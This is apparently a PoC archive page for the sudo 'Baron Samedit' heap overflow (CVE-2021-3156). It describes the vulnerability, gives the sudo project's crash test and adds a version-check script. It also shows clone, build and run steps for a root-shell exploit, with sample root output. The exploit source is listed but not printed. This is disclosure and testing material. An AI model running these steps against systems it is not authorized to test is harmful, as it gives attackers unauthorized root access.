PoC details: e23e8ab1ea5e044558d7e6648d0af50e98d2133d

Source
Related vulnerability
Title: Sudo buffer error vulnerability (CVE-2021-3156)
Description: Sudo is a program for Unix-like systems that allows users to execute commands with special privileges in a secure way. Sudo versions before 1.9.5p2 contain a buffer error vulnerability; an attacker can escalate to root using sudoedit -s together with a command-line argument that ends with a single backslash character.
Introduction
CVE-2021-3156
=============

Sudo before 1.9.5p2 contains an off-by-one error that can result in a heap-based buffer overflow, which allows privilege escalation to root via `sudoedit -s` and a command-line argument that ends with a single backslash character.

Credit to: Advisory by [Baron Samedit of Qualys](https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt)

### How to check if you are affected.

[The sudo project](https://www.sudo.ws/alerts/unescape_overflow.html) released a command that allows you to test whether your version of sudo is vulnerable:
```
sudoedit -s '\' `perl -e 'print "A" x 65536'`
```

If you receive a usage or error message, sudo is not vulnerable. If the result is a Segmentation fault, sudo is vulnerable.
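As an added example (not part of the cached PoC or of the sudo project's own tooling), a small shell script that compares the installed sudo version against 1.9.5p2, the first fixed release named above. It assumes `sudo --version` prints a line of the form `Sudo version X.Y.Z` or `Sudo version X.Y.ZpN`; distributions often backport fixes without changing that string, so a version that predates 1.9.5p2 only means the sudoedit check above should be run to confirm.

```shell
#!/bin/sh
# Added example: decide from a sudo version string whether it predates
# 1.9.5p2, the first fixed release named on this page. A "yes" is a prompt
# to run the project's sudoedit check, not proof of vulnerability, because
# distribution packages backport fixes without bumping the version.

# Split "1.8.31p2" into "1 8 31 2"; a missing "pN" suffix counts as patch 0.
version_fields() {
    v=$1
    base=${v%%p*}
    case $v in
        *p*) patch=${v##*p} ;;
        *)   patch=0 ;;
    esac
    echo "$base" | tr '.' ' ' | awk -v p="$patch" '{ printf "%d %d %d %d\n", $1, $2, $3, p }'
}

# Returns 0 (true) when the given version is older than 1.9.5p2.
sudo_version_before_fix() {
    set -- $(version_fields "$1")
    maj=$1; min=$2; pat=$3; plvl=$4
    if [ "$maj" -lt 1 ]; then return 0; fi
    if [ "$maj" -gt 1 ]; then return 1; fi
    if [ "$min" -lt 9 ]; then return 0; fi
    if [ "$min" -gt 9 ]; then return 1; fi
    if [ "$pat" -lt 5 ]; then return 0; fi
    if [ "$pat" -gt 5 ]; then return 1; fi
    [ "$plvl" -lt 2 ]
}

# Extract the version from "sudo --version" output, e.g. "Sudo version 1.8.31".
# Prints nothing when sudo is not installed.
installed_sudo_version() {
    sudo --version 2>/dev/null | awk '/^Sudo version/ { print $3; exit }'
}

if v=$(installed_sudo_version) && [ -n "$v" ]; then
    if sudo_version_before_fix "$v"; then
        echo "sudo $v predates 1.9.5p2: run the sudoedit check to confirm"
    else
        echo "sudo $v is 1.9.5p2 or later"
    fi
fi
```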

### Usage

**Root shell PoC for CVE-2021-3156 (no bruteforce)**
Tested on Ubuntu 20.04 (sudo 1.8.31)
```
$ git clone https://github.com/CyberCommands/CVE-2021-3156.git
$ cd CVE-2021-3156
$ make
mkdir libnss_x
cc -O3 -shared -nostdlib -o libnss_x/x.so.2 shellcode.c
cc -O3 -o exploit exploit.c
$ ./exploit
# whoami
root
```
File snapshot

```
[4.0K] /data/pocs/e23e8ab1ea5e044558d7e6648d0af50e98d2133d
├── [1.9K] exploit.c
├── [1.0K] LICENSE
├── [ 207] Makefile
├── [1.1K] README.md
└── [ 598] shellcode.c

0 directories, 5 files
```
Cached for you by the Shenlong bot
Notes
    1. It is recommended to access the PoC through the source first.
    2. If the source is no longer available or cannot be accessed, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
    3. Shenlong has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.